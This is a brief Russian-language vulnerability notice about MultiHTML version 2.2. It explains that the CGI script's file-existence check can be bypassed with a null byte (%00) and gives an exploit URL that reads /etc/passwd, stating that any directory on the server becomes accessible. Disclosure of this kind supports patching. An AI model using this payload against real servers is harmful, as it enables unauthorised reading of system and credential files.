Дырке обнаружена в MultiHTML version 2.2

MultiHTML CGI скрипт проверяет существование запрашиваемого файла, но это можно легко обойти отправляя «пустой» символ «%00«

Exploit:
http://www.example.com/cgi-bin/multihtml.pl?multi=/etc/passwd%00html

Таким образом можно получить доступ к любой директории сервера.



Оставить мнение